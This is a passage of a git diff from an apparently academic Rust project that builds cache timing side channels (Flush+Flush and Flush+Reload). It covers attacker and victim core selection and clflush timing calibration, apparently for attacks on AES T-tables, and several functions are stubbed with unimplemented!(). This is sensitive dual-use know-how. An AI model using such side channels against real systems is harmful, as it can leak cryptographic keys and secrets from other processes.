+ slicing: CacheSlicing,
+ attacker_core: usize,
+ victim_core: usize,
+}
+
+#[derive(Debug)]
+pub enum FlushAndFlushError {
+ NoSlicing,
+}
+
+#[derive(Debug)]
+pub struct SingleFlushAndFlush(FlushAndFlush);
+
+impl SingleFlushAndFlush {
+ pub fn new(attacker_core: usize, victim_core: usize) -> Result {
+ FlushAndFlush::new(attacker_core, victim_core).map(|ff| SingleFlushAndFlush(ff))
+ }
+
+ pub fn new_any_single_core() -> Result<(Self, CpuSet, usize), FlushAndFlushError> {
+ FlushAndFlush::new_any_single_core()
+ .map(|(ff, old, core)| (SingleFlushAndFlush(ff), old, core))
+ }
+
+ pub fn new_any_two_core(
+ distinct: bool,
+ ) -> Result<(Self, CpuSet, usize, usize), FlushAndFlushError> {
+ FlushAndFlush::new_any_two_core(distinct)
+ .map(|(ff, old, attacker, victim)| (SingleFlushAndFlush(ff), old, attacker, victim))
+ }
+}
+
+impl SingleAddrCacheSideChannel for SingleFlushAndFlush {
+ unsafe fn test_single(&mut self, addr: *const u8) -> Result {
+ unsafe { self.0.test_single(addr) }
+ }
+
+ unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError> {
+ unsafe { self.0.prepare_single(addr) }
+ }
+
+ fn victim_single(&mut self, operation: &dyn Fn()) {
+ self.0.victim_single(operation)
+ }
+
+ unsafe fn calibrate_single(
+ &mut self,
+ addresses: impl IntoIterator
- + Clone,
+ ) -> Result<(), ChannelFatalError> {
+ unsafe { self.0.calibrate_single(addresses) }
+ }
+}
+
+impl FlushAndFlush {
+ pub fn new(attacker_core: usize, victim_core: usize) -> Result {
+ if let Some(slicing) = get_cache_slicing(find_core_per_socket()) {
+ if !slicing.can_hash() {
+ return Err(FlushAndFlushError::NoSlicing);
+ }
+
+ let ret = Self {
+ thresholds: Default::default(),
+ addresses_ready: Default::default(),
+ slicing,
+ attacker_core,
+ victim_core,
+ };
+ Ok(ret)
+ } else {
+ Err(FlushAndFlushError::NoSlicing)
+ }
+ }
+
+ // Takes a buffer / list of addresses or pages
+ // Takes a list of core pairs
+ // Run optimized calibration and processes results
+ fn calibration_for_core_pairs<'a>(
+ core_pairs: impl Iterator
- + Clone,
+ pages: impl Iterator
- ,
+ ) -> Result)>, FlushAndFlushError>
+ {
+ let core_per_socket = find_core_per_socket();
+
+ let operations = [
+ CalibrateOperation2T {
+ prepare: maccess::,
+ op: only_flush,
+ name: "clflush_remote_hit",
+ display_name: "clflush remote hit",
+ },
+ CalibrateOperation2T {
+ prepare: noop::,
+ op: only_flush,
+ name: "clflush_miss",
+ display_name: "clflush miss",
+ },
+ ];
+ const HIT_INDEX: usize = 0;
+ const MISS_INDEX: usize = 1;
+
+ let mut calibrate_results2t_vec = Vec::new();
+
+ for page in pages {
+ // FIXME Cache line size is magic
+ let mut r = unsafe {
+ calibrate_fixed_freq_2_thread(
+ &page[0] as *const u8,
+ 64,
+ page.len() as isize,
+ &mut core_pairs.clone(),
+ &operations,
+ CalibrationOptions {
+ hist_params: HistParams {
+ bucket_number: CFLUSH_BUCKET_NUMBER,
+ bucket_size: CFLUSH_BUCKET_SIZE,
+ iterations: CFLUSH_NUM_ITER << 1,
+ },
+ verbosity: Verbosity::NoOutput,
+ optimised_addresses: true,
+ },
+ core_per_socket,
+ )
+ };
+ calibrate_results2t_vec.append(&mut r);
+ }
+ unimplemented!();
+ }
+
+ fn new_with_core_pairs(
+ core_pairs: impl Iterator
- + Clone,
+ ) -> Result<(Self, usize, usize), FlushAndFlushError> {
+ let m = MMappedMemory::new(PAGE_LEN);
+ let array: &[u8] = m.slice();
+
+ let res = Self::calibration_for_core_pairs(core_pairs, vec![array].into_iter());
+
+ // Call the calibration function on a local page sized buffer.
+
+ // Classical analysis flow to generate all ASVP, Threshold, Error.
+
+ // Reduction to determine average / max error for each core.
+
+ // Select the proper core
+ unimplemented!();
+ }
+
+ pub fn new_any_single_core() -> Result<(Self, CpuSet, usize), FlushAndFlushError> {
+ // Generate core iterator
+ let mut core_pairs: Vec<(usize, usize)> = Vec::new();
+
+ let old = sched_getaffinity(Pid::from_raw(0)).unwrap();
+
+ for i in 0..CpuSet::count() {
+ if old.is_set(i).unwrap() {
+ core_pairs.push((i, i));
+ }
+ }
+
+ // Generate all single core pairs
+
+ // Call out to private constructor that takes a core pair list, determines best and makes the choice.
+ // The private constructor will set the correct affinity for main (attacker thread)
+
+ Self::new_with_core_pairs(core_pairs.into_iter()).map(|(channel, attacker, victim)| {
+ assert_eq!(attacker, victim);
+ (channel, old, attacker)
+ })
+ }
+
+ pub fn new_any_two_core(
+ distinct: bool,
+ ) -> Result<(Self, CpuSet, usize, usize), FlushAndFlushError> {
+ let old = sched_getaffinity(Pid::from_raw(0)).unwrap();
+
+ let mut core_pairs: Vec<(usize, usize)> = Vec::new();
+
+ for i in 0..CpuSet::count() {
+ if old.is_set(i).unwrap() {
+ for j in 0..CpuSet::count() {
+ if old.is_set(j).unwrap() {
+ if i != j || !distinct {
+ core_pairs.push((i, j));
+ }
+ }
+ }
+ }
+ }
+
+ Self::new_with_core_pairs(core_pairs.into_iter()).map(|(channel, attacker, victim)| {
+ if distinct {
+ assert_ne!(attacker, victim);
+ }
+ (channel, old, attacker, victim)
+ })
+ }
+
+ fn get_slice(&self, addr: *const u8) -> Slice {
+ self.slicing.hash(addr as usize).unwrap()
+ }
+
+ pub fn set_cores(&mut self, attacker: usize, victim: usize) -> Result<(), nix::Error> {
+ let old_attacker = self.attacker_core;
+ let old_victim = self.victim_core;
+
+ self.attacker_core = attacker;
+ self.victim_core = victim;
+
+ let pages: Vec = self
+ .thresholds
+ .keys()
+ .map(|sp: &SP| sp.page)
+ //.copied()
+ .collect();
+ match self.recalibrate(pages) {
+ Ok(()) => Ok(()),
+ Err(e) => {
+ self.attacker_core = old_attacker;
+ self.victim_core = old_victim;
+ Err(e)
+ }
+ }
+ }
+
+ fn recalibrate(&mut self, pages: impl IntoIterator
- ) -> Result<(), nix::Error> {
+ // unset readiness status.
+ // Call calibration with core pairs with a single core pair
+ // Use results \o/ (or error out)
+
+ unimplemented!();
+ }
+}
+
+impl Debug for FlushAndFlush {
+ fn fmt(&self, f: &mut Formatter<'_>) -> fmt::Result {
+ f.debug_struct("FlushAndFlush")
+ .field("thresholds", &self.thresholds)
+ .field("addresses_ready", &self.addresses_ready)
+ .field("slicing", &self.slicing)
+ .finish()
+ }
+}
+
+use cache_utils::calibration::cum_sum;
+use cache_utils::mmap::MMappedMemory;
+
+impl MultipleAddrCacheSideChannel for FlushAndFlush {
+ const MAX_ADDR: u32 = 3;
+
+ unsafe fn test<'a, 'b, 'c>(
+ &'a mut self,
+ addresses: &'b mut (impl Iterator
- + Clone),
+ ) -> Result, SideChannelError> {
+ let mut result = Vec::new();
+ let mut tmp = Vec::new();
+ let mut i = 0;
+ for addr in addresses {
+ i += 1;
+ let t = unsafe { only_flush(*addr) };
+ tmp.push((addr, t));
+ if i == Self::MAX_ADDR {
+ break;
+ }
+ }
+ for (addr, time) in tmp {
+ if !self.addresses_ready.contains(&addr) {
+ return Err(AddressNotReady(*addr));
+ }
+ let vpn: VPN = (*addr as usize) & (!0xfff); // FIXME
+ let slice = self.get_slice(*addr);
+ let threshold_error = &self.thresholds[&SP { slice, page: vpn }];
+ // refactor this into a struct threshold method ?
+ if threshold_error.threshold.is_hit(time) {
+ result.push((*addr, CacheStatus::Hit))
+ } else {
+ result.push((*addr, CacheStatus::Miss))
+ }
+ }
+ Ok(result)
+ }
+
+ unsafe fn prepare<'a, 'b, 'c>(
+ &'a mut self,
+ addresses: &'b mut (impl Iterator
- + Clone),
+ ) -> Result<(), SideChannelError> {
+ use core::arch::x86_64 as arch_x86;
+ let mut i = 0;
+ let addresses_cloned = addresses.clone();
+ for addr in addresses_cloned {
+ i += 1;
+ let vpn: VPN = get_vpn(*addr);
+ let slice = self.get_slice(*addr);
+ if self.addresses_ready.contains(&addr) {
+ continue;
+ }
+ if !self.thresholds.contains_key(&SP { slice, page: vpn }) {
+ return Err(AddressNotCalibrated(*addr));
+ }
+ if i == Self::MAX_ADDR {
+ break;
+ }
+ }
+ i = 0;
+ for addr in addresses {
+ i += 1;
+ unsafe { flush(*addr) };
+ self.addresses_ready.insert(*addr);
+ if i == Self::MAX_ADDR {
+ break;
+ }
+ }
+ unsafe { arch_x86::_mm_mfence() };
+ Ok(())
+ }
+
+ fn victim(&mut self, operation: &dyn Fn()) {
+ operation(); // TODO use a different helper core ?
+ }
+
+ // TODO
+ // To split into several functions
+ // Calibration
+ // Make predictions out of results -> probably in cache_utils
+ // Compute Threshold & Error
+ // Compute stats from (A,V,S,P) into (A,V), or other models -> in cache_utils
+ // Use a generic function ? fn reduce (HashMap<(A,S,V,P), Result>, Fn (A,S,V,P) -> T, a reduction method)
+
+ // Determine best core (A,V) amongst options -> in here
+ // Extract results out of calibration -> in self.calibrate
+
+ unsafe fn calibrate(
+ &mut self,
+ addresses: impl IntoIterator
- + Clone,
+ ) -> Result<(), ChannelFatalError> {
+ unimplemented!()
+ /*
+ let mut pages = HashMap::>::new();
+ for addr in addresses {
+ let page = get_vpn(addr);
+ pages.entry(page).or_insert_with(HashSet::new).insert(addr);
+ }
+
+ let core_per_socket = find_core_per_socket();
+
+ let operations = [
+ CalibrateOperation2T {
+ prepare: maccess::,
+ op: only_flush,
+ name: "clflush_remote_hit",
+ display_name: "clflush remote hit",
+ },
+ CalibrateOperation2T {
+ prepare: noop::,
+ op: only_flush,
+ name: "clflush_miss",
+ display_name: "clflush miss",
+ },
+ ];
+ const HIT_INDEX: usize = 0;
+ const MISS_INDEX: usize = 1;
+
+ // Generate core iterator
+ let mut core_pairs: Vec<(usize, usize)> = Vec::new();
+
+ let old = sched_getaffinity(Pid::from_raw(0)).unwrap();
+
+ for i in 0..CpuSet::count() {
+ if old.is_set(i).unwrap() {
+ core_pairs.push((i, i));
+ }
+ }
+
+ // Probably needs more metadata
+ let mut per_core: HashMap>> =
+ HashMap::new();
+
+ let mut core_averages: HashMap = HashMap::new();
+
+ for (page, _) in pages {
+ let p = page as *const u8;
+ let r = unsafe {
+ calibrate_fixed_freq_2_thread(
+ p,
+ 64, // FIXME : MAGIC
+ PAGE_LEN as isize, // MAGIC
+ &mut core_pairs.clone().into_iter(),
+ &operations,
+ CalibrationOptions {
+ hist_params: HistParams {
+ bucket_number: CFLUSH_BUCKET_NUMBER,
+ bucket_size: CFLUSH_BUCKET_SIZE,
+ iterations: CFLUSH_NUM_ITER << 1,
+ },
+ verbosity: Verbosity::NoOutput,
+ optimised_addresses: true,
+ },
+ core_per_socket,
+ )
+ };
+
+ /* TODO refactor a good chunk of calibration result analysis to make thresholds in a separate function
+ Generating Cumulative Sums and then using that to compute error count for each possible threshold is a recurring joke.
+ It might be worth in a second time to refactor this to handle more generic strategies (such as double thresholds)
+ What about handling non attributes values (time values that are not attributed as hit or miss)
+ */
+
+ /*
+
+ Non Naive F+F flow
+ Vec -> ASVP,Thresholds,Error Does not care as much. Can probably re-use functions to build a single one.
+ Add API to query predicted error rate, compare with covert channel result.
+ */
+
+ for result2t in r {
+ if result2t.main_core != result2t.helper_core {
+ panic!("Unexpected core numbers");
+ }
+ let core = result2t.main_core;
+ match result2t.res {
+ Err(e) => panic!("Oops: {:#?}", e),
+ Ok(results_1t) => {
+ for r1t in results_1t {
+ // This will be turned into map_values style functions + Calibration1T -> Reasonable Type
+
+ // Already handled
+ let offset = r1t.offset;
+ let addr = unsafe { p.offset(offset) };
+ let slice = self.get_slice(addr);
+
+ // To Raw histogram
+ let miss_hist = &r1t.histogram[MISS_INDEX];
+ let hit_hist = &r1t.histogram[HIT_INDEX];
+ if miss_hist.len() != hit_hist.len() {
+ panic!("Maformed results");
+ }
+ let len = miss_hist.len();
+
+ // Cum Sums
+ let miss_cum_sum = cum_sum(miss_hist);
+ let hit_cum_sum = cum_sum(hit_hist);
+ let miss_total = miss_cum_sum[len - 1];
+ let hit_total = hit_cum_sum[len - 1];
+
+ // Error rate per threshold computations
+
+ // Threshold is less than equal => miss, strictly greater than => hit
+ let mut error_miss_less_than_hit = vec![0; len - 1];
+ // Threshold is less than equal => hit, strictly greater than => miss
+ let mut error_hit_less_than_miss = vec![0; len - 1];
+
+ let mut min_error_hlm = u32::max_value();
+ let mut min_error_mlh = u32::max_value();
+
+ for i in 0..(len - 1) {
+ error_hit_less_than_miss[i] =
+ miss_cum_sum[i] + (hit_total - hit_cum_sum[i]);
+ error_miss_less_than_hit[i] =
+ hit_cum_sum[i] + (miss_total - miss_cum_sum[i]);
+
+ if error_hit_less_than_miss[i] < min_error_hlm {
+ min_error_hlm = error_hit_less_than_miss[i];
+ }
+ if error_miss_less_than_hit[i] < min_error_mlh {
+ min_error_mlh = error_miss_less_than_hit[i];
+ }
+ }
+
+ let hlm = min_error_hlm < min_error_mlh;
+
+ let (errors, min_error) = if hlm {
+ (&error_hit_less_than_miss, min_error_hlm)
+ } else {
+ (&error_miss_less_than_hit, min_error_mlh)
+ };
+
+ // Find the min -> gives potetial thresholds with info
+ let mut potential_thresholds = Vec::new();
+
+ for i in 0..errors.len() {
+ if errors[i] == min_error {
+ let num_true_hit;
+ let num_false_hit;
+ let num_true_miss;
+ let num_false_miss;
+ if hlm {
+ num_true_hit = hit_cum_sum[i];
+ num_false_hit = miss_cum_sum[i];
+ num_true_miss = miss_total - num_false_hit;
+ num_false_miss = hit_total - num_true_hit;
+ } else {
+ num_true_miss = miss_cum_sum[i];
+ num_false_miss = hit_cum_sum[i];
+ num_true_hit = hit_total - num_false_miss;
+ num_false_hit = miss_total - num_true_miss;
+ }
+ potential_thresholds.push((
+ i,
+ num_true_hit,
+ num_false_hit,
+ num_true_miss,
+ num_false_miss,
+ min_error as f32 / (hit_total + miss_total) as f32,
+ ));
+ }
+ }
+
+ let index = (potential_thresholds.len() - 1) / 2;
+ let (threshold, _, _, _, _, error_rate) = potential_thresholds[index];
+ // insert in per_core
+ if per_core
+ .entry(core)
+ .or_insert_with(HashMap::new)
+ .entry(page)
+ .or_insert_with(HashMap::new)
+ .insert(
+ slice,
+ (
+ Threshold {
+ bucket_index: threshold, // FIXME the bucket to time conversion
+ miss_faster_than_hit: !hlm,
+ },
+ error_rate,
+ ),
+ )
+ .is_some()
+ {
+ panic!("Duplicate slice result");
+ }
+ let core_average = core_averages.get(&core).unwrap_or(&(0.0, 0));
+ let new_core_average =
+ (core_average.0 + error_rate, core_average.1 + 1);
+ core_averages.insert(core, new_core_average);
+ }
+ }
+ }
+ }
+ }
+
+ // We now get ASVP stuff with the correct core(in theory)
+
+ // We now have a HashMap associating stuffs to cores, iterate on it and select the best.
+ let mut best_core = 0;
+
+ let mut best_error_rate = {
+ let ca = core_averages[&0];
+ ca.0 / ca.1 as f32
+ };
+ for (core, average) in core_averages {
+ let error_rate = average.0 / average.1 as f32;
+ if error_rate < best_error_rate {
+ best_core = core;
+ best_error_rate = error_rate;
+ }
+ }
+ let mut thresholds = HashMap::new();
+ println!("Best core: {}, rate: {}", best_core, best_error_rate);
+ let tmp = per_core.remove(&best_core).unwrap();
+ for (page, per_page) in tmp {
+ let page_entry = thresholds.entry(page).or_insert_with(HashMap::new);
+ for (slice, per_slice) in per_page {
+ println!(
+ "page: {:x}, slice: {}, threshold: {:?}, error_rate: {}",
+ page, slice, per_slice.0, per_slice.1
+ );
+ page_entry.insert(slice, per_slice.0);
+ }
+ }
+ self.thresholds = thresholds;
+ println!("{:#?}", self.thresholds);
+
+ // TODO handle error better for affinity setting and other issues.
+
+ self.addresses_ready.clear();
+
+ let mut cpuset = CpuSet::new();
+ cpuset.set(best_core).unwrap();
+ sched_setaffinity(Pid::from_raw(0), &cpuset).unwrap();
+ Ok(())
+ */
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ #[test]
+ fn it_works() {
+ assert_eq!(2 + 2, 4);
+ }
+}
diff --git a/flush_flush/src/naive.rs b/flush_flush/src/naive.rs
new file mode 100644
index 0000000..e69de29
diff --git a/flush_reload/Cargo.toml b/flush_reload/Cargo.toml
new file mode 100644
index 0000000..34fa174
--- /dev/null
+++ b/flush_reload/Cargo.toml
@@ -0,0 +1,11 @@
+[package]
+name = "flush_reload"
+version = "0.1.0"
+authors = ["GuillaumeDIDIER "]
+edition = "2018"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[dependencies]
+cache_utils = { path = "../cache_utils" }
+cache_side_channel = { path = "../cache_side_channel" }
diff --git a/flush_reload/src/lib.rs b/flush_reload/src/lib.rs
new file mode 100644
index 0000000..7fa658c
--- /dev/null
+++ b/flush_reload/src/lib.rs
@@ -0,0 +1,18 @@
+#![feature(unsafe_block_in_unsafe_fn)]
+#![deny(unsafe_op_in_unsafe_fn)]
+
+use cache_side_channel::{
+ CacheStatus, ChannelFatalError, SideChannelError, SingleAddrCacheSideChannel,
+};
+use cache_utils::calibration::only_reload;
+use cache_utils::flush;
+
+pub mod naive;
+
+#[cfg(test)]
+mod tests {
+ #[test]
+ fn it_works() {
+ assert_eq!(2 + 2, 4);
+ }
+}
diff --git a/aes-t-tables/src/naive_flush_and_reload.rs b/flush_reload/src/naive.rs
similarity index 92%
rename from aes-t-tables/src/naive_flush_and_reload.rs
rename to flush_reload/src/naive.rs
index 2ad891f..0db7214 100644
--- a/aes-t-tables/src/naive_flush_and_reload.rs
+++ b/flush_reload/src/naive.rs
@@ -1,4 +1,6 @@
-use crate::{CacheStatus, ChannelFatalError, SideChannelError, SingleAddrCacheSideChannel};
+use cache_side_channel::{
+ CacheStatus, ChannelFatalError, SideChannelError, SingleAddrCacheSideChannel,
+};
use cache_utils::calibration::only_reload;
use cache_utils::flush;